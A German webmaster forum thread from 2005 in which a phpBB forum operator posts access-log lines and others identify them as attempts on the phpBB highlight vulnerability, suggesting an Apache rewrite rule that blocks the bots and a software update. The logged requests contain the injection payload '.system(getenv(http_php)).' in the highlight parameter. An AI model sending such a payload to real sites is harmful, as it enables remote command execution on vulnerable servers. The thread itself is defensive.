"mozilla/4.0"

[Malte Landwehr]

Hi

Was zu Hölle ist das? Macht pro IP/Host immer nur 1 bis 2 Klicks. Ist das so ein phpBB-Wurm (es handelt sich um ein phpBB-Forum)?

Code: Alles auswählen

nameservices.net - - [18/jul/2005:13:57:14 +0200] "get /viewtopic.php?t=600&highlight='.system(getenv(http_php)).' http/1.0" 200 114619 "-" "mozilla/4.0"
65-38-185-100.unknown.data393.net - - [18/jul/2005:14:00:43 +0200] "get /viewtopic.php?t=434&highlight='.system(getenv(http_php)).' http/1.0" 200 13966 "-" "mozilla/4.0"
209-163-167-100.gen.twtelecom.net - - [18/jul/2005:14:12:56 +0200] "get /viewtopic.php?t=534&highlight='.system(getenv(http_php)).' http/1.0" 200 99820 "-" "mozilla/4.0"
mediagraphicdesign.com - - [18/jul/2005:14:13:01 +0200] "get /viewtopic.php?t=265&highlight='.system(getenv(http_php)).' http/1.0" 200 124934 "-" "mozilla/4.0"
ns3.fm-hebergement-internet.com - - [18/jul/2005:14:18:52 +0200] "get /viewtopic.php?t=425&highlight='.system(getenv(http_php)).' http/1.0" 200 119523 "-" "mozilla/4.0"
mediagraphicdesign.com - - [18/jul/2005:14:22:43 +0200] "get /viewtopic.php?t=566&highlight='.system(getenv(http_php)).' http/1.0" 200 33897 "-" "mozilla/4.0"
rrcs-24-106-236-243.central.biz.rr.com - - [18/jul/2005:14:25:16 +0200] "get /viewtopic.php?t=373&highlight='.system(getenv(http_php)).' http/1.0" 200 13966 "-" "mozilla/4.0"
hoss.bigcornoar.com - - [18/jul/2005:14:27:07 +0200] "get /viewtopic.php?t=556&highlight='.system(getenv(http_php)).' http/1.0" 200 56284 "-" "mozilla/4.0"
ev1s-216-127-90-24.ev1servers.net - - [18/jul/2005:14:28:50 +0200] "get /viewtopic.php?t=537&highlight='.system(getenv(http_php)).' http/1.0" 200 84575 "-" "mozilla/4.0"
oceanus.site5.com - - [18/jul/2005:14:52:13 +0200] "get /viewtopic.php?t=457&start=15&highlight='.system(getenv(http_php)).' http/1.0" 301 312 "-" "mozilla/4.0"
oceanus.site5.com - - [18/jul/2005:14:52:18 +0200] "get /viewtopic.php?t=457&highlight='.system(getenv(http_php)).' http/1.0" 301 312 "-" "mozilla/4.0"
65-38-185-100.unknown.data393.net - - [18/jul/2005:14:54:24 +0200] "get /viewtopic.php?t=412&highlight='.system(getenv(http_php)).' http/1.0" 200 51603 "-" "mozilla/4.0"
65-38-185-100.unknown.data393.net - - [18/jul/2005:15:06:09 +0200] "get /viewtopic.php?t=136&postdays=0&postorder=asc&start=15&highlight='.system(getenv(http_php)).' http/1.0" 301 312 "-" "mozilla/4.0"
ts005d27.lab-mo.concentric.net - - [18/jul/2005:15:15:19 +0200] "get /viewtopic.php?t=530&highlight='.system(getenv(http_php)).' http/1.0" 200 115258 "-" "mozilla/4.0"
c-24-245-12-97.hsd1.mn.comcast.net - - [18/jul/2005:15:31:20 +0200] "get /viewtopic.php?t=432&highlight='.system(getenv(http_php)).' http/1.0" 200 34492 "-" "mozilla/4.0"
ns2-dev.neworleans.com - - [18/jul/2005:15:31:33 +0200] "get /viewtopic.php?t=197&highlight='.system(getenv(http_php)).' http/1.0" 200 13966 "-" "mozilla/4.0"
mladost.beotel.net - - [18/jul/2005:15:41:59 +0200] "get /viewtopic.php?t=508&highlight='.system(getenv(http_php)).' http/1.0" 200 115324 "-" "mozilla/4.0"
sd420.sivit.org - - [18/jul/2005:15:52:43 +0200] "get /viewtopic.php?t=524&highlight='.system(getenv(http_php)).' http/1.0" 200 121706 "-" "mozilla/4.0"
nameservices.net - - [18/jul/2005:16:02:08 +0200] "get /viewtopic.php?t=554&highlight='.system(getenv(http_php)).' http/1.0" 200 13966 "-" "mozilla/4.0"
206-225-81-32.dedicated.abac.net - - [18/jul/2005:16:05:08 +0200] "get /viewtopic.php?t=205&highlight='.system(getenv(http_php)).' http/1.0" 200 13966 "-" "mozilla/4.0"
gamez2.tweakdsl.nl - - [18/jul/2005:16:23:18 +0200] "get /viewtopic.php?t=297&highlight='.system(getenv(http_php)).' http/1.0" 200 120087 "-" "mozilla/4.0"
203_194_154_200.cometeor.com - - [18/jul/2005:16:36:25 +0200] "get /viewtopic.php?t=517&highlight='.system(getenv(http_php)).' http/1.0" 200 41663 "-" "mozilla/4.0"
quoteworld.org - - [18/jul/2005:16:36:29 +0200] "get /viewtopic.php?t=399&highlight='.system(getenv(http_php)).' http/1.0" 200 117735 "-" "mozilla/4.0"
x.deltaserver.com - - [18/jul/2005:16:38:26 +0200] "get /viewtopic.php?t=280&start=15&highlight='.system(getenv(http_php)).' http/1.0" 301 316 "-" "mozilla/4.0"
194.146.225.96 - - [18/jul/2005:16:58:38 +0200] "get /viewtopic.php?t=259&highlight='.system(getenv(http_php)).' http/1.0" 200 57265 "-" "mozilla/4.0"
sd36.sivit.org - - [18/jul/2005:17:05:05 +0200] "get /viewtopic.php?t=445&highlight='.system(getenv(http_php)).' http/1.0" 200 121671 "-" "mozilla/4.0"
203_194_154_200.cometeor.com - - [18/jul/2005:17:10:31 +0200] "get /viewtopic.php?t=531&highlight='.system(getenv(http_php)).' http/1.0" 200 51735 "-" "mozilla/4.0"
wannabe.a.linuxmaster.biz - - [18/jul/2005:17:12:26 +0200] "get /viewtopic.php?t=211&highlight='.system(getenv(http_php)).' http/1.0" 200 45306 "-" "mozilla/4.0"
dedicated14.thehideout.net - - [18/jul/2005:17:18:15 +0200] "get /viewtopic.php?t=530&highlight='.system(getenv(http_php)).' http/1.0" 200 115262 "-" "mozilla/4.0"
ns3217.ovh.net - - [18/jul/2005:17:19:40 +0200] "get /viewtopic.php?t=427&highlight='.system(getenv(http_php)).' http/1.0" 200 116282 "-" "mozilla/4.0"
ts005d27.lab-mo.concentric.net - - [18/jul/2005:17:24:32 +0200] "get /viewtopic.php?t=591&highlight='.system(getenv(http_php)).' http/1.0" 200 54995 "-" "mozilla/4.0"
server1.bnext.nl - - [18/jul/2005:17:42:34 +0200] "get /viewtopic.php?t=271&highlight='.system(getenv(http_php)).' http/1.0" 200 13526 "-" "mozilla/4.0"
user-0vvddri.cable.mindspring.com - - [18/jul/2005:17:47:43 +0200] "get /viewtopic.php?t=512&highlight='.system(getenv(http_php)).' http/1.0" 200 115706 "-" "mozilla/4.0"
gamblingsafari.com - - [18/jul/2005:17:56:37 +0200] "get /viewtopic.php?t=47&start=0&highlight='.system(getenv(http_php)).' http/1.0" 301 312 "-" "mozilla/4.0"
gamblingsafari.com - - [18/jul/2005:17:56:42 +0200] "get /viewtopic.php?t=47&postdays=0&postorder=asc&start=0&highlight='.system(getenv(http_php)).' http/1.0" 301 312 "-" "mozilla/4.0"
hummer6.net - - [18/jul/2005:17:59:23 +0200] "get /viewtopic.php?t=106&highlight='.system(getenv(http_php)).' http/1.0" 301 312 "-" "mozilla/4.0"
khaki.srv2.com - - [18/jul/2005:18:00:31 +0200] "get /viewtopic.php?t=224&highlight='.system(getenv(http_php)).' http/1.0" 200 37779 "-" "mozilla/4.0"
64.50.6.103.ptr.us.xo.net - - [18/jul/2005:18:07:08 +0200] "get /viewtopic.php?t=508&highlight='.system(getenv(http_php)).' http/1.0" 200 115322 "-" "mozilla/4.0"
65.39.229.100 - - [18/jul/2005:18:08:06 +0200] "get /viewtopic.php?t=378&highlight='.system(getenv(http_php)).' http/1.0" 200 51934 "-" "mozilla/4.0"
ts005d27.lab-mo.concentric.net - - [18/jul/2005:18:11:11 +0200] "get /viewtopic.php?t=423&view=next&highlight='.system(getenv(http_php)).' http/1.0" 301 312 "-" "mozilla/4.0"
. - - [18/jul/2005:18:19:02 +0200] "get /viewtopic.php?t=304&highlight='.system(getenv(http_php)).' http/1.0" 301 312 "-" "mozilla/4.0"
219-80-214-6.static.tfn.net.tw - - [18/jul/2005:18:22:18 +0200] "get /viewtopic.php?t=531&highlight='.system(getenv(http_php)).' http/1.0" 200 40030 "-" "mozilla/4.0"
ts005d27.lab-mo.concentric.net - - [18/jul/2005:18:23:43 +0200] "get /viewtopic.php?t=600&highlight='.system(getenv(http_php)).' http/1.0" 200 114266 "-" "mozilla/4.0"
62-197-78-170.teledisnet.be - - [18/jul/2005:18:25:00 +0200] "get /viewtopic.php?t=77&highlight='.system(getenv(http_php)).' http/1.0" 200 61179 "-" "mozilla/4.0"
83-217-84-73.colo-antw.realroot.be - - [18/jul/2005:18:40:05 +0200] "get /viewtopic.php?t=485&highlight='.system(getenv(http_php)).' http/1.0" 200 74864 "-" "mozilla/4.0"
206-225-81-32.dedicated.abac.net - - [18/jul/2005:18:42:10 +0200] "get /viewtopic.php?t=512&highlight='.system(getenv(http_php)).' http/1.0" 200 115346 "-" "mozilla/4.0"
85-10-194-81.clients.your-server.de - - [18/jul/2005:18:48:02 +0200] "get /viewtopic.php?t=210&highlight='.system(getenv(http_php)).' http/1.0" 200 33915 "-" "mozilla/4.0"
69.73.171.139 - - [18/jul/2005:18:52:10 +0200] "get /viewtopic.php?t=554&highlight='.system(getenv(http_php)).' http/1.0" 200 13966 "-" "mozilla/4.0"
rebelsquadrons.org - - [18/jul/2005:18:57:39 +0200] "get /viewtopic.php?t=378&start=0&postdays=0&postorder=asc&highlight=&highlight='.system(getenv(http_php)).' http/1.0" 301 312 "-" "mozilla/4.0"
ip-space.by.proserve.nl - - [18/jul/2005:19:09:36 +0200] "get /viewtopic.php?t=494&highlight='.system(getenv(http_php)).' http/1.0" 200 57503 "-" "mozilla/4.0"
pcp05008732pcs.sanarb01.mi.comcast.net - - [18/jul/2005:19:10:58 +0200] "get /viewtopic.php?t=426&highlight='.system(getenv(http_php)).' http/1.0" 200 117298 "-" "mozilla/4.0"
static-213-115-169-132.sme.bredbandsbolaget.se - - [18/jul/2005:19:12:27 +0200] "get /viewtopic.php?t=420&highlight='.system(getenv(http_php)).' http/1.0" 200 115381 "-" "mozilla/4.0"
raq8.hiwaay.net - - [18/jul/2005:19:15:21 +0200] "get /viewtopic.php?t=553&highlight='.system(getenv(http_php)).' http/1.0" 200 116998 "-" "mozilla/4.0"

edit:
Während ich diesen Beitrag schreibe ist der noch 4 mal gekommen. Wieder nur 1 Klick und neue Ips/Hosts.

[Chris2005]

Erstmal:

Code: Alles auswählen

RewriteCond %{HTTP_USER_AGENT} ^mozilla [OR]
RewriteRule ^.*$ - [F,L]

Dann hast Du erstmal Ruhe und kannst in Ruhe das Zeug analysieren. Da keine normalen User mit "mozilla" kommen (sondern mit "Mozilla") sperrst Du auch niemanden aus.

Dieses "&highlight='.system(getenv(http_php))." macht mich stutzig. Ich meine zu erinneren, dass es irgendeinen Bug in Verbindung mit der Highlight-Funktion gibt.

[Malte Landwehr]

Ok, habe ihn jetzt ausgesperrt.
Das von dir angesprochenen "highlight..." scheint wirlich Teil eines Exploits zu sein, gegen das mein Forum aber geschütztz ist.


edit:
Mit deinem Code erhalte ich ne Fehlermeldung. "The document has been move permanent"

[Chris2005]

huch... Dann lass mal das [OR] weg. Das sollte normalerweise nur da stehen, wenn noch andere RewriteConds vorhanden sind...

"moved permanently" ist aber eigentlich http 301, der da oben überhaupt nicht auftaucht.

[Malte Landwehr]

*hust*
ich meinte auch "You dont have permission to access" *dummidumm*

Sorry, das kommt davon wenn man soviele Tabs gleichzeitig offen hat.
Ohne das [OR] geht`s. Danke.

[Steph_Dan]

Da keine normalen User mit "mozilla" kommen (sondern mit "Mozilla") sperrst Du auch niemanden aus.

Was schon wieder ein Fall für den Kleinbuchstaben-Rattenfänger wäre!

[Luckybuy3000]

Verwende einfach die aktuelle Forensoftware, dann sollte das Problem behoben sein. Falls du eine Nuke Seite betreibst, auch Nuke-Sentinel blockt das ab.


https://www.phpbb.de/viewtopic.php?t=93205